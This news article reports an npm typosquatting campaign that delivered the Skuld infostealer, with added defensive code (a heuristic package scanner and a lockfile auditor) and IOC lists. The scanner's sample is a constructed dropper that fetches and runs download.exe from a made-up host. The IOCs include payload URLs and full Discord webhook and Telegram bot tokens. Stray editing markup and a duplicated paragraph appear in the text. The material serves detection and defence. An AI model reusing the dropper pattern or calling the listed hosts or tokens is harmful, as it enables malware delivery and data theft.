Skuld Malware Exploits Windows Utilities Packages

Researchers at Socket uncovered a malware campaign in the npm ecosystem in which an account named “k303903” published fake packages that delivered the Skuld infostealer; the packages were downloaded hundreds of times before the registry removed them.

Skuld Malware

Analysis indicates that “k303903” is likely the same actor behind the aliases “shegotit2” and “pressurized”; all three accounts used similar methods to spread malware through npm, underscoring the supply chain risk and the need for stronger dependency controls.

The campaign targeted npm developers with the Skuld infostealer and is the second such attack in two months. It closely resembles an earlier attack on Roblox developers, showing how readily the attackers adapt their lures.

Skuld steals passwords, cookies, sensitive files, and browsing history from Chromium- and Gecko-based browsers.

The threat actors used typosquatting and obfuscation to compromise machines and steal data, repeatedly adapting their tactics with new packaging and distribution methods.

The December 2024 campaign used common methods and commodity malware, showing the threat actors’ consistent reliance on deceptive tactics.

The package code downloads and runs a malicious file using the fs-extra, path, node-fetch, and child_process modules, with the download URL disguised to look legitimate.

The code was obfuscated with Obfuscator.io to hinder detection. Once the package is installed, it fetches the Skuld infostealer and runs it as download.exe.
</gre_replace>
<gr_replace lines="23" cat="clarify" orig="Actor k303903 used">
Actor k303903 used typosquatting to upload fake npm packages, tricking developers into installing them. The malware then exfiltrated stolen data through a Discord webhook, which also served as its command-and-control channel.

Actor k303903 used typosquatting to upload fake npm packages, tricking developers into installing them. This enabled data theft via a Discord webhook and command-and-control setup.

Hosting payloads on trusted developer services such as replit.dev added to the deception, stressing the need for careful review of every package before it is installed.
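The install-time chain described above (a lifecycle hook, fetch with node-fetch, write with fs-extra/path, execute via child_process, all wrapped in Obfuscator.io output) has a recognisable shape that a pre-install scanner can flag. The following is an added example written for this page, not the campaign's code and not Socket's tooling. The package.json and source it scans are constructed stand-ins: the hex-named identifiers and push/shift string-array rotation imitate javascript-obfuscator (obfuscator.io) output, and the trycloudflare hostname is made up. The throwaway-host pattern is taken from the domains in this page's IOC lists.

```javascript
// Added example: static heuristics for an npm package that downloads and runs a
// binary at install time. Not the campaign's code; sample inputs are constructed.

const NETWORK_MODULES = new Set(['node-fetch', 'axios', 'http', 'https', 'undici']);
const DISK_MODULES = new Set(['fs', 'fs-extra', 'fs/promises']);
const EXEC_SINKS = ['exec', 'execFile', 'spawn', 'execSync', 'execFileSync', 'spawnSync'];
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Free tunnelling / hosting services that appear in this page's IOC lists.
const THROWAWAY_HOSTS = /\.(?:trycloudflare\.com|replit\.dev|ply\.gg)(?:[:/]|$)/;

// Lifecycle scripts that npm runs automatically during `npm install`.
function lifecycleHooks(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string');
}

// Module names pulled in via require() or ES import ("node:" prefix stripped).
function requiredModules(src) {
  const names = new Set();
  const re = /require\(\s*['"]([^'"]+)['"]\s*\)|\bfrom\s+['"]([^'"]+)['"]/g;
  let m;
  while ((m = re.exec(src)) !== null) names.add((m[1] || m[2]).replace(/^node:/, ''));
  return [...names];
}

// Surface features typical of javascript-obfuscator (obfuscator.io) output.
function obfuscatorMarkers(src) {
  const markers = [];
  const hexIds = new Set(src.match(/\b_0x[0-9a-f]{4,}\b/g) || []);
  if (hexIds.size >= 3) markers.push('_0x-prefixed hex identifiers');
  if (/\['push'\]\(\w+\['shift'\]\(\)\)/.test(src)) markers.push('string-array rotation via push/shift');
  if (/(?:\\x[0-9a-fA-F]{2}){4,}/.test(src)) markers.push('hex-escaped string literals');
  return markers;
}

// Combine the signals; two or more independent findings => "suspicious".
function auditPackage(pkg, src) {
  const findings = [];
  const hooks = lifecycleHooks(pkg);
  if (hooks.length) findings.push(`runs code at install time via ${hooks.join(', ')}`);

  const mods = requiredModules(src);
  const net = mods.filter((m) => NETWORK_MODULES.has(m));
  const disk = mods.filter((m) => DISK_MODULES.has(m));
  const sinks = mods.includes('child_process')
    ? EXEC_SINKS.filter((fn) => new RegExp(`\\b${fn}\\s*\\(`).test(src))
    : [];
  if (net.length && disk.length && sinks.length) {
    findings.push(`download-write-execute chain: ${[...net, ...disk].join(', ')} + ${sinks.join(', ')}`);
  }

  const markers = obfuscatorMarkers(src);
  if (markers.length) findings.push(`obfuscator.io-style markers: ${markers.join('; ')}`);

  for (const url of src.match(/https?:\/\/[^\s'"`)]+/g) || []) {
    if (THROWAWAY_HOSTS.test(url)) findings.push(`payload URL on throwaway hosting: ${url}`);
  }
  if (/\.exe\b/.test(src)) findings.push('writes or runs a Windows executable');
  return { verdict: findings.length >= 2 ? 'suspicious' : 'clean', findings };
}

// Constructed sample: name taken from the IOC list, contents written for this demo.
const SAMPLE_PKG = {
  name: 'windows-version-check',
  version: '1.0.3',
  scripts: { postinstall: 'node index.js' },
};
// Constructed stand-in for an obfuscated dropper: a rotated string array followed
// by fetch -> write -> execFile. The hostname is made up and never contacted.
const SAMPLE_SRC = [
  "const _0x2f1a=['node-fetch','fs-extra','path','child_process','download.exe'];",
  "(function(_0x4b3c,_0x5d2e){const _0x6e1f=function(_0x7a09){while(--_0x7a09){_0x4b3c['push'](_0x4b3c['shift']());}};_0x6e1f(++_0x5d2e);}(_0x2f1a,0x1a4));",
  "const fetch=require('node-fetch');const fs=require('fs-extra');const path=require('path');const {execFile}=require('child_process');",
  "fetch('https://constructed-example.trycloudflare.com/page').then(r=>r.arrayBuffer()).then(b=>{",
  "  const out=path.join(process.env.TEMP||'.','download.exe');fs.writeFileSync(out,Buffer.from(b));execFile(out);});",
].join('\n');

// Constructed benign package for comparison.
const BENIGN_PKG = { name: 'pad-left-demo', version: '1.0.0', scripts: { test: 'node test.js' } };
const BENIGN_SRC = "module.exports = (s, n) => ' '.repeat(Math.max(0, n - s.length)) + s;";

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_SRC), null, 2));
console.log(JSON.stringify(auditPackage(BENIGN_PKG, BENIGN_SRC), null, 2));
```

These are heuristics, not a signature: legitimate native-addon packages also use install hooks and child_process, which is why the verdict requires several independent signals and why a hit should trigger manual review rather than an automatic block. The sample source is a string that is only scanned, never evaluated.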

The malicious npm packages were downloaded more than 600 times, leading to stolen credentials and sensitive data. Despite quick removal by the npm registry, the damage was significant.

Socket reports that the attack mirrors a November 2024 incident, showing how quickly threat actors evolve by reusing malware such as Skuld and refining their tactics.

Developers can mitigate such risks with layered security and automated tools that detect and block malicious dependencies before they are installed.
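One concrete form of that automation is a lockfile audit run before any install script is allowed to execute. The example below is added for this page and is not Socket's or npm's code. It reads a package-lock.json (v2/v3 layout), flags any dependency whose name appears in the IOC lists that follow, reports dependencies that declare install scripts, and flags names within two edits of packages the project is known to use. The lockfile contents and the EXPECTED allowlist are constructed for the demo; the blocklist is exactly the package names published in this page's IOC sections.

```javascript
// Added example: audit an npm lockfile against this page's IOC package names and
// flag typosquat-style near-misses. Sample lockfile and allowlist are constructed.

// Package names published as IOCs for k303903, shegotit2 and pressurized.
const BLOCKLIST = new Set([
  'windows-confirm', 'windows-version-check', 'downloadsolara', 'solara-config', 'aaaa89852889',
  'o7rcyti43qv', 'bootstrapper-solara', 'solara-upgrade',
  'atlantis-api', 'xeno-api', 'core-builder', 'upgrade-solara', 'xeno-builder', 'get-matcha',
  'solara-builder', 'solara-cleanup', 'solara-installer', 'solarainstaller', 'powerupdate',
  'windows.solara', 'windowsversionupdate', 'solaramatcher', 'deathball', 'updkernels',
  'antibyfron', 'programcleanup', 'robloxint',
]);

// Names the project is known to depend on (hypothetical allowlist for the demo).
const EXPECTED = ['express', 'lodash', 'node-fetch', 'fs-extra'];

// package-lock.json v2/v3 keys packages by install path; the name is whatever
// follows the last "node_modules/" (scoped names keep their "@scope/" prefix).
// npm sets hasInstallScript on entries that declare preinstall/install/postinstall.
function lockfilePackages(lock) {
  const out = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    const idx = key.lastIndexOf('node_modules/');
    if (idx === -1) continue; // the "" entry is the root project itself
    out.push({
      name: key.slice(idx + 'node_modules/'.length),
      version: meta.version,
      hasInstallScript: meta.hasInstallScript === true,
    });
  }
  return out;
}

// Plain Levenshtein distance; enough to catch one- or two-character typosquats.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Returns exact blocklist hits, near-misses against the allowlist, and every
// dependency that will run code during installation.
function auditLockfile(lock, expected) {
  const blocked = [];
  const nearMiss = [];
  const installScripts = [];
  for (const pkg of lockfilePackages(lock)) {
    if (BLOCKLIST.has(pkg.name)) blocked.push(pkg.name);
    if (pkg.hasInstallScript) installScripts.push(pkg.name);
    if (expected.includes(pkg.name)) continue;
    for (const want of expected) {
      const d = levenshtein(pkg.name, want);
      // Ignore very short names, where two edits is most of the name.
      if (d > 0 && d <= 2 && Math.min(pkg.name.length, want.length) >= 5) {
        nearMiss.push({ name: pkg.name, lookalike: want, distance: d });
        break;
      }
    }
  }
  return { blocked, nearMiss, installScripts };
}

// Constructed lockfile: versions are made up; "lodahs" is a constructed typosquat.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/express': { version: '4.19.2' },
    'node_modules/fs-extra': { version: '11.2.0' },
    'node_modules/lodahs': { version: '0.0.1' },
    'node_modules/windows-version-check': { version: '1.0.3', hasInstallScript: true },
    'node_modules/@types/node': { version: '20.12.0' },
  },
};

console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK, EXPECTED), null, 2));
```

Run this against the real lockfile after resolving dependencies with `npm ci --ignore-scripts` (or with `ignore-scripts=true` in .npmrc), so that no lifecycle hook executes until the audit has passed; a non-empty `blocked` list should fail the build outright, while `nearMiss` and `installScripts` entries are the ones to review by hand.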

Indicators of Compromise (IOCs) — k303903

Malicious Packages:

  • windows-confirm
  • windows-version-check
  • downloadsolara
  • solara-config
  • aaaa89852889

Malicious URLs:

  • hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page
  • hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/page
  • hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/start

Discord Webhook:

  • hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw

SHA256 Hashes:

  • 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07

Indicators of Compromise (IOCs) — shegotit2

Malicious Packages:

  • o7rcyti43qv
  • bootstrapper-solara
  • solara-upgrade

Malicious URLs:

  • hxxps://tours-picture-hunt-electrical.trycloudflare[.]com/page
  • hxxps://pointer-walt-blond-bi.trycloudflare[.]com/page
  • hxxps://fossil-otherwise-stylus-sq.trycloudflare[.]com/page
  • common-temperature.gl.at.ply[.]gg:38635

Telegram Webhook:

  • hxxps://api.telegram[.]org/bot7740258238:AAFZwAKMURbNCg1N0L12TTCRXWYfqUe93To

SHA256 Hashes:

  • 3f78493b9bf7a448bec44c154343e6a372ebb0dc3188e61b4699f166896d7181

Indicators of Compromise (IOCs) — pressurized

Malicious Packages:

  • atlantis-api
  • xeno-api
  • core-builder
  • upgrade-solara
  • xeno-builder
  • get-matcha
  • solara-builder
  • solara-cleanup
  • solara-installer
  • solarainstaller
  • powerupdate
  • windows.solara
  • windowsversionupdate
  • solaramatcher
  • deathball
  • updkernels
  • antibyfron
  • programcleanup
  • robloxint

Malicious URLs:

  • hxxps://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/skuld
  • hxxps://3d7a78cb-b661-450d-b035-888519a4df86-00-udawht6rsoni.spock.replit[.]dev/skuld
  • hxxps://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/blank
  • hxxps://3d7a78cb-b661-450d-b035-888519a4df86-00-udawht6rsoni.spock.replit[.]dev/blank
  • hxxps://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/empyrean
  • hxxps://3d7a78cb-b661-450d-b035-888519a4df86-00-udawht6rsoni.spock.replit[.]dev/empyrean
  • hxxps://ebdfa635-60a4-499e-9da8-2b609eb309c3-00-3k30gj5i2z09x.riker.replit[.]dev/kyore
  • hxxps://ebdfa635-60a4-499e-9da8-2b609eb309c3-00-3k30gj5i2z09x.riker.replit[.]dev/sk
  • hxxps://ebdfa635-60a4-499e-9da8-2b609eb309c3-00-3k30gj5i2z09x.riker.replit[.]dev/ps
  • hxxps://github.com/ifhw/code/raw/main/cmd[.]exe
  • hxxps://github.com/ifhw/code/raw/main/RuntimeServiceWorker[.]exe
  • hxxps://github.com/ifhw/code/raw/main/py[.]exe

About the Author:

FirstHackersNews- Identifies Security
